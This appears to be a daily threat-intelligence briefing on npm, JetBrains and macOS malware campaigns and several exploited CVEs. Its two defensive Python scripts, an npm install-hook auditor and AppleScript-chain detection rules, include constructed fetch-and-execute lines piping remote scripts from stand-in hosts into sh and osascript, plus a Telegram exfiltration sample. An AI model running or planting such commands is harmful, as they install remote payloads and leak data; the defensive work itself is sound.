
Cyware Daily Threat Intelligence - June 17, 2026


A single forgotten maintainer account can turn a trusted software supply chain into a high-speed credential leak. In today's briefing, attackers repurposed Mastra’s npm packages with a trojanized dependency, exposing developer machines and CI/CD environments to infostealing malware within a 27-minute window. The breach highlights how dormant access can ripple through entire customer ecosystems.

A critical zero-day in Microsoft Defender, tracked as CVE-2026-50656, lets attackers escalate to SYSTEM privileges on Windows 10 and 11—even with Real-Time Protection enabled. The public release of the RoguePlanet exploit means any authenticated user can seize full device control, with no patch timeline yet announced.

On the macOS front, Sapphire Sleet is leveraging AppleScript and crafted .scpt files to bypass built-in protections and harvest credentials. Microsoft Threat Intelligence links the campaign to North Korean operators, with staged payloads exfiltrating data via the Telegram Bot API and establishing persistence through launch plists.

Top Malware Reported in the Last 24 Hours

Mastra npm packages ship stealthy infostealer

Mastra is an npm organization whose packages were compromised to distribute a stealthy infostealer through malicious package updates. The attackers republished Mastra packages with a trojanized dependency, easy-day-js, whose postinstall hook fetched and executed a remote payload during installation. They gained access through dormant maintainer accounts, one of which had been inactive for sixteen months, and used it to infiltrate developer workflows. The infection method targets Linux, macOS, and Windows environments by leveraging routine npm installs. It exposes developer machines and CI/CD environments to theft of browser and crypto-wallet extension data, with downstream impact on Mastra's customers. Multiple firms, including SafeDep, Socket, StepSecurity, JFrog, Microsoft, and Endor Labs, published analysis as the attack unfolded in a 27-minute window.
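The attack vector above is an install-time lifecycle hook that fetches and runs remote code. The following audit script is an added example (not Mastra's code or any of the named vendors' tooling) that flags such hooks in package.json files; the sample tree is constructed, and the real easy-day-js contents differ.

```python
"""Audit npm lifecycle hooks for fetch-and-execute behaviour (added example,
not Mastra's or any vendor's code). Flags preinstall/install/postinstall
scripts that download remote content and run it, the pattern described for
the trojanized easy-day-js dependency. SAMPLE_TREE is constructed."""
import json
import os
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
FETCH_RE = re.compile(r"\b(curl|wget)\b|https?://|\bfetch\(", re.I)
EXEC_RE = re.compile(r"\|\s*(sh|bash|zsh|node)\b|\bnode\s+-e\b|\beval\b|child_process", re.I)

# Constructed sample: package name -> package.json contents (not the real packages).
SAMPLE_TREE = {
    "easy-day-js": {"name": "easy-day-js", "version": "0.0.0-constructed",
                    "scripts": {"postinstall": "curl -s https://example.invalid/p.sh | sh"}},
    "left-pad": {"name": "left-pad", "version": "1.3.0"},
    "native-addon": {"name": "native-addon", "version": "2.0.0",
                     "scripts": {"install": "node-gyp rebuild"}},
}

def audit_package(pkg):
    """Return (hook, command, severity) for each lifecycle hook in one package."""
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # test/build scripts do not run when installed as a dependency
        fetch, execute = bool(FETCH_RE.search(cmd)), bool(EXEC_RE.search(cmd))
        if fetch and execute:
            severity = "high"    # downloads content and runs it at install time
        elif fetch or execute:
            severity = "medium"  # half the pattern; read the referenced script
        else:
            severity = "info"    # e.g. "node setup.js": intent lives in the file, review it
        findings.append((hook, cmd, severity))
    return findings

def audit_tree(tree):
    """Audit a {name: package.json dict} map; returns only packages with findings."""
    return {name: f for name, f in ((n, audit_package(p)) for n, p in tree.items()) if f}

def scan_node_modules(root):
    """Walk a real node_modules directory and audit every package.json in it."""
    tree = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                tree[os.path.relpath(dirpath, root)] = json.load(fh)
    return audit_tree(tree)
```

Run `scan_node_modules("node_modules")` after `npm ci --ignore-scripts` to review hooks before letting them execute; "info" findings still warrant reading the referenced file.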

Malicious JetBrains plugins siphon AI keys

At least 15 malicious plugins on the JetBrains Marketplace function as credential-stealing malware targeting AI API keys. The campaign includes lookalike tools such as DeepSeek AI Assist, DeepSeek Junit Test, and DeepSeek Git Commit, which transmit entered keys to a hardcoded server. The plugins offer “paid” users AI keys that may have been harvested from free users, turning development workflows into a credential exchange pipeline. The operation spans seven vendor accounts, with first uploads in October 2025 and new activity as recent as June 10, 2026. Aikido Security and BleepingComputer confirmed the credential-theft code.

ClickFix loaders widen ransomware delivery

ClickFix is a social-engineering technique whose operators are expanding its loader arsenal with new variants: BabaDeda, Lorem Ipsum, and Potemkin. ClickFix tricks users into running attacker-provided commands, and the new loaders support PowerShell execution, DLL side-loading, and domain generation for resilient command-and-control. The activity is linked to Vanilla Tempest, known for deploying Rhysida and BlackCat ransomware. Targets span the education, financial, architecture, legal services, and construction technology sectors. ClickFix campaigns often begin with a single employee running a “fix” and escalate to business disruption and extortion once additional payloads arrive.

Top Vulnerabilities Reported in the Last 24 Hours

Windows Defender zero-day grants SYSTEM privileges

CVE-2026-50656 is a privilege escalation vulnerability in Microsoft Defender (CVSS not specified) that allows authenticated attackers to gain SYSTEM-level privileges. Successful exploitation lets attackers take full control of affected Windows devices. CVE-2026-50656 is actively exploited, with a public proof-of-concept available. Nightmare Eclipse released the RoguePlanet exploit as part of a series targeting Microsoft products. The vulnerability affects Windows 10 and Windows 11, with no patch timeline announced.

Hackers seize Joomla sites via JCE

CVE-2026-48907 is a critical remote code execution vulnerability in the Joomla Content Editor (JCE) extension (CVSS 10.0). CVE-2026-48907 allows unauthenticated attackers to upload and execute PHP code, granting full site control. Attackers are actively exploiting CVE-2026-48907 in the wild. CSIRT Italia and CISA flagged the exploitation, and CISA added it to the Known Exploited Vulnerabilities catalog with a patch deadline of June 19, 2026 for FCEB agencies. The issue affects JCE versions 1.0.0 through 2.9.99.4, with a fix in 2.9.99.5.

Cloud fleet plunders WordPress SMTP secrets

CVE-2026-4020 is an unauthenticated credential disclosure vulnerability in the Gravity SMTP plugin for WordPress. CVE-2026-4020 allows attackers to steal SMTP credentials and API keys, putting email systems and connected services at risk. Attackers are actively exploiting CVE-2026-4020, with activity reported from February through June. Honeylabs linked the campaign to 3,158 IPs across 92 networks in 43 countries, including a Google Cloud “fleet,” and noted tracking via a unique JA4H hash. A fix is available in Gravity SMTP 2.1.5.

Top Threat Actors Reported in the Last 24 Hours

Sapphire Sleet targets Macs via AppleScript

Sapphire Sleet (a North Korean threat actor) is suspected to operate with a primary motive of credential theft and persistent access. Sapphire Sleet leverages AppleScript-based malware chains and delivers staged payloads via crafted .scpt files, keeping execution within Script Editor to evade built-in protections. Sapphire Sleet uses remote AppleScript stages piped into osascript, with mac-cur1 orchestrating and mac-cur2/mac-cur4 delivering a credential-harvester app that exfiltrates data via the Telegram Bot API. Sapphire Sleet targets businesses with developer, IT, or Mac-heavy teams. Sapphire Sleet’s campaign uses socially engineered “SDK update” lures and preserves user-initiated execution context, dynamically selecting payloads using user-agent identifiers such as mac-cur1 through mac-cur5. Microsoft Threat Intelligence discovered and documented the campaign.
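The observables in this chain (a .scpt opened in Script Editor, a remote stage piped into osascript, the mac-cur1 through mac-cur5 user-agent selectors, Telegram Bot API traffic, and a launch plist written for persistence) translate into detection rules. The block below is an added example, not Microsoft's detection content; it assumes a simplified "timestamp|process|detail" event format and runs over constructed sample events.

```python
"""Detection rules for the AppleScript delivery chain described above (added
example, not Microsoft's detection content). Events are assumed to arrive in a
"timestamp|process|detail" format; map it to your EDR's fields. SAMPLE_LOG is
constructed, not captured telemetry."""
import re

RULES = [  # (name, severity, predicate over one parsed event)
    ("scpt_opened_in_script_editor", "low",  # legitimate too; context for the rules below
     lambda e: e["proc"] == "Script Editor" and e["detail"].lower().endswith(".scpt")),
    ("remote_stage_piped_to_osascript", "high",
     lambda e: re.search(r"\b(curl|wget)\b[^|]*\|\s*osascript\b", e["detail"], re.I) is not None),
    ("mac_cur_user_agent", "high",  # the mac-cur1..mac-cur5 payload selectors from the report
     lambda e: re.search(r"\bmac-cur[1-5]\b", e["detail"], re.I) is not None),
    ("telegram_bot_api_traffic", "medium",  # exfil channel; noisy where bots are legitimate
     lambda e: "api.telegram.org/bot" in e["detail"].lower()),
    ("launch_plist_written_by_script", "medium",
     lambda e: e["proc"] in ("osascript", "Script Editor")
     and re.search(r"Library/Launch(Agents|Daemons)/\S+\.plist", e["detail"]) is not None),
]

SAMPLE_LOG = """\
2026-06-17T10:01:02Z|Script Editor|open /Users/dev/Downloads/sdk_update.scpt
2026-06-17T10:01:05Z|sh|curl -fsSL -A mac-cur1 https://stage.example.invalid/a | osascript
2026-06-17T10:01:09Z|curl|GET https://stage.example.invalid/b UA=mac-cur2
2026-06-17T10:02:30Z|CredHelper.app|POST https://api.telegram.org/bot<TOKEN>/sendDocument
2026-06-17T10:02:31Z|osascript|write /Users/dev/Library/LaunchAgents/com.example.update.plist
2026-06-17T10:05:00Z|Terminal|osascript -e 'display dialog "hello"'
2026-06-17T10:06:00Z|Safari|GET https://www.example.com/ UA=Mozilla/5.0
"""

def parse_event(line):
    ts, proc, detail = line.split("|", 2)
    return {"ts": ts, "proc": proc, "detail": detail}

def evaluate(event):
    """Names of the rules one event matches, in RULES order."""
    return [name for name, _sev, pred in RULES if pred(event)]

def scan(log_text):
    """Run every rule over a log; returns (rule, severity, process, timestamp) hits."""
    severity = {name: sev for name, sev, _pred in RULES}
    hits = []
    for raw in log_text.splitlines():
        if raw.strip():
            ev = parse_event(raw)
            hits += [(r, severity[r], ev["proc"], ev["ts"]) for r in evaluate(ev)]
    return hits
```

Correlating the "high" hits with a preceding .scpt open on the same host within a few minutes gives a much stronger signal than any single rule.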

Frequently Asked Questions

  1. What is Mastra? Mastra’s npm organization was hit by a supply-chain compromise that pushed malicious updates into widely used packages, turning routine installs into an infostealer risk across Linux, macOS, and Windows. The intrusion republished Mastra packages with a trojanized dependency, easy-day-js, where a postinstall hook pulled down and launched a remote payload during installation.

  2. What is ClickFix? The ClickFix social-engineering playbook is expanding again, with new loaders—BabaDeda, Lorem Ipsum, and Potemkin—used to pave the way for follow-on malware and ransomware. The technique tricks users into running attacker-provided commands, and these newer loaders add flexibility through methods like PowerShell execution, DLL side-loading, and domain generation for command-and-control resilience.

  3. What is CVE-2026-50656? A critical zero-day in Microsoft Defender (CVE-2026-50656) lets an authenticated attacker on a Windows machine jump straight to SYSTEM-level privileges, effectively taking over the device. The “RoguePlanet” exploit abuses a race condition tied to improper link resolution before file access, and the published PoC works even when Microsoft Defender’s Real-Time Protection is enabled.

  4. What is CVE-2026-48907? A critical flaw in the Joomla Content Editor (JCE) extension (CVE-2026-48907, CVSS 10.0) is being used to take over Joomla websites by uploading and running attacker-controlled PHP code. The attack path is blunt: unauthenticated attackers can create a new editor profile and then use it to push malicious code that grants full control of the site.

  5. What is CVE-2026-4020? A coordinated operation is exploiting a flaw in the Gravity SMTP plugin for WordPress (CVE-2026-4020) to steal SMTP credentials and API keys without authentication, putting email systems and connected services at risk. Attackers are using the access to hunt for high-value configuration and secret files such as .env and .git/config, signaling a focus on credential harvesting rather than simple website vandalism.

  6. What is Sapphire Sleet? Sapphire Sleet (a North Korean threat actor) is pushing a macOS malware chain that turns AppleScript into a stealthy delivery path, keeping execution inside Script Editor to sidestep many built-in protections. Microsoft Threat Intelligence says they use socially engineered “SDK update” lures delivered as crafted .scpt files, which fetch remote AppleScript stages and pipe them straight into osascript, letting the early stages run without being written to disk.
